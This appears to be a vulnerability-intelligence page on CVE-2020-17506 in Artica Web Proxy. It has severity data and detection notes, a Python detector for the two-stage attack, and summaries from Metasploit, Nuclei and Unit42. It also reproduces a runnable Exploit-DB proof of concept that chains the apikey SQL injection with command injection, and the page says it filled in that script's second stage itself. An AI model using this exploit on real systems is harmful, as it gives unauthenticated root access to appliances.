CVE-2020-17506
Published 2020-08-12
Priority P1 89 · critical 9.8 · CVSS 3.1
AV:N / AC:L / PR:N / UI:N / S:U / C:H / I:H / A:H
ITW · EXPLOIT · VulnCheck KEV
Exploited in the wild
EPSS 93.97% (99.8th percentile)
Artica Web Proxy 4.30.00000000 allows remote attacker to bypass privilege detection and gain web backend administrator privileges through SQL injection of the apikey parameter in fw.login.php.
Affected (1 range)
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| articatech | web_proxy | — | — |
Detection & IOCs (extracted from sources)
path: /fw.login.php?apikey=%27UNION%20select%201,%27YToyOntzOjM6InVpZCI7czo0OiItMTAwIjtzOjIyOiJBQ1RJVkVfRElSRUNUT1JZX0lOREVYIjtzOjE6IjEiO30=%27;
- Detect CVE-2020-17506 exploitation attempts by matching GET requests to /fw.login.php whose apikey parameter carries the SQL injection payload: a UNION select followed by a base64-encoded serialized session string. The base64 blob above is the public PoC's; it decodes to the serialized PHP array a:2:{s:3:"uid";s:4:"-100";s:22:"ACTIVE_DIRECTORY_INDEX";s:1:"1";}, so a rule keyed only on that exact string misses any payload that carries a different session blob. Also match the URL-decoded apikey value on a quote followed by UNION ... select.
- After the auth bypass, the attacker issues a POST to /cyrus.index.php with the service-cmds-peform parameter containing pipe-delimited OS commands (e.g. ||<cmd>||). Monitor for this pattern as the command injection stage.
- A successful auth bypass results in a Set-Cookie header containing PHPSESSID and a response body containing the string 'artica-applianc'. Use both as confirmation matchers.
- The exploit chain combines two stages: (1) unauthenticated SQL injection via apikey in fw.login.php to obtain a privileged session, then (2) authenticated OS command injection via service-cmds-peform in cyrus.index.php, resulting in RCE as root.
- The vulnerability is version-specific; only Artica Web Proxy 4.30.00000000 is confirmed affected. Scope detection rules accordingly to reduce false positives against other versions.
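The two detection notes above (the apikey SQL injection on fw.login.php and the pipe-delimited service-cmds-peform command on cyrus.index.php) as working detection logic. This is an added example, not code from any of the sources on this page or from the Artica project: it runs both checks over a constructed list of request records (the shape a reverse proxy or WAF might log; the field names `src`, `method`, `uri`, `body` are this example's own) and decodes the PoC's base64 session blob to show the uid it smuggles in. It also covers a case the notes do not spell out, a UNION payload that uses `+` for spaces and carries no base64 blob.

```python
import base64
import re
from urllib.parse import unquote, urlsplit

# Constructed sample requests; not real traffic. The first two model the two-stage
# chain (SQLi auth bypass, then command injection); the last two are benign traffic
# to the same endpoints and must not fire.
SAMPLE_REQUESTS = [
    {"src": "10.0.0.7", "method": "GET",
     "uri": "/fw.login.php?apikey=%27UNION%20select%201,%27YToyOntzOjM6InVpZCI7czo0OiItMTAwIjtzOjIyOiJBQ1RJVkVfRElSRUNUT1JZX0lOREVYIjtzOjE6IjEiO30=%27;",
     "body": ""},
    {"src": "10.0.0.7", "method": "POST", "uri": "/cyrus.index.php",
     "body": "service-cmds-peform=%7C%7Cid%7C%7C"},
    {"src": "10.0.0.9", "method": "GET", "uri": "/fw.login.php?apikey=3f9c1b2e", "body": ""},
    {"src": "10.0.0.9", "method": "POST", "uri": "/cyrus.index.php",
     "body": "service-cmds-peform=restart"},
]

UNION_RE = re.compile(r"'\s*union\s+(?:all\s+)?select\b", re.IGNORECASE)
B64_RE = re.compile(r"'([A-Za-z0-9+/]{16,}={0,2})'")       # quoted base64 blob in the UNION row
UID_RE = re.compile(r's:3:"uid";s:\d+:"(-?\d+)"')           # uid entry of the serialized PHP array
PIPE_CMD_RE = re.compile(r"\|\|([^|]+)\|\|")                # ||<cmd>|| as used by the command stage


def parse_form(data):
    """Split a query string or form body into a dict.

    Uses unquote(), not unquote_plus()/parse_qs, so a literal '+' inside a base64
    blob survives; the '+'-as-space convention is handled separately when matching."""
    out = {}
    for pair in data.split("&"):
        if "=" in pair:
            key, value = pair.split("=", 1)
            out[unquote(key)] = unquote(value)
    return out


def decode_session_blob(blob):
    """Return (serialized PHP session, uid) for the base64 string carried in the UNION row."""
    serialized = base64.b64decode(blob).decode("latin-1")
    match = UID_RE.search(serialized)
    return serialized, (match.group(1) if match else None)


def check_stage1(req):
    """Stage 1: SQL injection in the apikey parameter of fw.login.php (CVE-2020-17506)."""
    parts = urlsplit(req["uri"])
    if req["method"] != "GET" or not parts.path.endswith("/fw.login.php"):
        return None
    apikey = parse_form(parts.query).get("apikey", "")
    if not UNION_RE.search(apikey.replace("+", " ")):   # '+' may encode a space in a query
        return None
    finding = {"stage": 1, "src": req["src"], "apikey": apikey, "uid": None, "session": None}
    blob = B64_RE.search(apikey)
    if blob:
        try:
            finding["session"], finding["uid"] = decode_session_blob(blob.group(1))
        except ValueError:
            pass   # not valid base64: still a UNION attempt, just without the PoC's session blob
    return finding


def check_stage2(req):
    """Stage 2: command injection via service-cmds-peform in cyrus.index.php (pipe-delimited)."""
    if req["method"] != "POST" or not urlsplit(req["uri"]).path.endswith("/cyrus.index.php"):
        return None
    value = parse_form(req["body"]).get("service-cmds-peform", "")
    match = PIPE_CMD_RE.search(value)
    if not match:
        return None
    return {"stage": 2, "src": req["src"], "command": match.group(1)}


def scan(requests):
    """Run both checks over a list of request records; returns findings in request order."""
    findings = []
    for req in requests:
        for check in (check_stage1, check_stage2):
            finding = check(req)
            if finding:
                findings.append(finding)
    return findings


if __name__ == "__main__":
    for finding in scan(SAMPLE_REQUESTS):
        print(finding)
```

On the sample data the scan returns exactly two findings, both from 10.0.0.7: the stage-1 hit with uid -100 decoded from the blob, then the stage-2 hit with the command `id`. Correlating both stages from one source within a short window is the strongest signal; a lone stage-1 hit is an attempt, a lone stage-2 hit implies the attacker already holds a valid session.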
CVSS provenance
- NVD v3.1: 9.8 CRITICAL (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)
- NVD v2.0: 7.5 HIGH (AV:N/AC:L/Au:N/C:P/I:P/A:P)
- VulnCheck: 9.8 CRITICAL
GHSA
GHSA-jvgw-6rmv-pw7c: Artica Web Proxy 4 (CWE-89; rated HIGH by GHSA, versus CRITICAL 9.8 at NVD)
ghsa_unreviewed · 2022-05-24
Artica Web Proxy 4.30.00000000 allows remote attacker to bypass privilege detection and gain web backend administrator privileges through SQL injection of the apikey parameter in fw.login.php.
VulnCheck
articatech web_proxy Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')
vulncheck · 2020 · CVSS 9.8 CRITICAL
Artica Web Proxy 4.30.00000000 allows remote attacker to bypass privilege detection and gain web backend administrator privileges through SQL injection of the apikey parameter in fw.login.php.
Affected: articatech web_proxy
Required Action: Apply remediations or mitigations per vendor instructions or discontinue use of the product if remediation or mitigations are unavailable.
Exploitation References:
- https://dashboard.shadowserver.org/statistics/honeypot/vulnerability/map/?day=2023-12-01&host_type=src&vulnerability=cve-2020-17506
- https://dashboard.shadowserver.org/statistics/honeypot/vulnerability/map/?day=2023-12-25&host_type=src&vulnerability=cve-2020-17506
- https://dashboard.s
No detection rules found.
Exploit-DB
Artica Proxy 4.3.0 - Authentication Bypass
exploitdb · 2020-08-13 · CVSS 9.8 CRITICAL
```python
# Exploit Title: Artica Proxy 4.3.0 - Authentication Bypass
# Google Dork: N/A
# Date: 2020-08-13
# Exploit Author: Dan Duffy
# Vendor Homepage: http://articatech.net/
# Software Link: http://articatech.net/download2x.php?IsoOnly=yes
# Version: 4.30.00000000 (REQUIRED)
# Tested on: Debian
# CVE : CVE-2020-17506
import argparse

import requests
from bs4 import BeautifulSoup  # imported by the original listing; unused in the part reproduced here


def bypass_auth(session, args):
    # Stage 1: SQL injection in the apikey parameter of fw.login.php. The UNION row's second
    # column is a base64 serialized PHP session with uid -100, which the backend accepts as an
    # administrator and answers with a privileged PHPSESSID cookie stored in the session object.
    login_endpoint = "/fw.login.php?apikey="
    payload = "%27UNION%20select%201,%27YToyOntzOjM6InVpZCI7czo0OiItMTAwIjtzOjIyOiJBQ1RJVkVfRElSRUNUT1JZX0lOREVYIjtzOjE6IjEiO30=%27;"
    print("[+] Bypassing authentication...")
    session.get(args.host + login_endpoint + payload, verify=False)
    return session


def run_command(session, args):
    # Stage 2: the listing is cut off after the next line. The endpoint and parameter below are
    # filled in from this page's detection notes (POST /cyrus.index.php, service-cmds-peform with
    # a pipe-delimited command), not copied from the original file.
    cmd_endpoint = "/cyrus.index.php"
    data = {"service-cmds-peform": "||" + args.cmd + "||"}
    return session.post(args.host + cmd_endpoint, data=data, verify=False).text


if __name__ == "__main__":
    parser = argparse.ArgumentParser()
    parser.add_argument("host", help="base URL of the appliance web console")
    parser.add_argument("cmd", help="OS command to run on the appliance")
    args = parser.parse_args()
    print(run_command(bypass_auth(requests.Session(), args), args))
```
Metasploit
Artica proxy 4.30.000000 Auth Bypass service-cmds-peform Command Injection
metasploit
This module exploits an authenticated command injection vulnerability in Artica Proxy; combined with an authentication bypass discovered in the same version, the vulnerability can be triggered without knowing the credentials. The application runs as a virtual appliance, and successful exploitation yields remote code execution as root on the remote system.
Nuclei
Artica Web Proxy 4.30 - Authentication Bypass/SQL Injection
nuclei · CVSS 9.8 CRITICAL
Template (info block):
```yaml
id: CVE-2020-17506
info:
  name: Artica Web Proxy 4.30 - Authentication Bypass/SQL Injection
  author: dwisiswant0
  severity: critical
  description: Artica Web Proxy 4.30.00000000 allows remote attacker to bypass privilege detection and gain web backend administrator privileges through SQL injection of the apikey parameter in fw.login.php.
  impact: |
    Successful exploitation of this vulnerability could allow an attacker to bypass authentication and execute arbitrary SQL queries, potentially leading to unauthorized access and data leakage.
```
Unit42
Network Attack Trends: Internet of Threats (August-October 2020)
blogs_unit42 · 2021-01-22
## Network Attack Trends: Internet of Threats (August-October 2020)
Yue Guan, Lei Xu, Ken Hsu, Zhibin Zhang · Published: January 22, 2021
Tags: Malware, Trend Reports, Vulnerabilities, DDoS, Exploits, IoT, Network security trends
## Executive Summary
Unit 42 researchers observed interesting attack trends from August-October 2020. Despite a surge in scanner activities and HTTP directory traversal exploitation attempts, CVE-2012-2311 and CVE-2012-1823, which were the most commonly exploited vulnerabilities in the wild in early summer 2020, are no longer at the top of that list. Several new critical exploits, including but not limited to CVE-2020-17496 and CVE-2020-25213, have emerged and were being utilized at a constant and concerning rate as of fall 2020. To complicate matters, malicious actors are well aware that new exploits aren’t always needed to get the job done. Based on observations of malicious traffic for the designated three months, weaponized ThinkPHP vulnerabilities like CVE-2018-20062 and CVE-2019-908
References:
- http://packetstormsecurity.com/files/158868/Artica-Proxy-4.3.0-Authentication-Bypass.html
- http://packetstormsecurity.com/files/159267/Artica-Proxy-4.30.000000-Authentication-Bypass-Command-Injection.html
- https://blog.max0x4141.com/post/artica_proxy/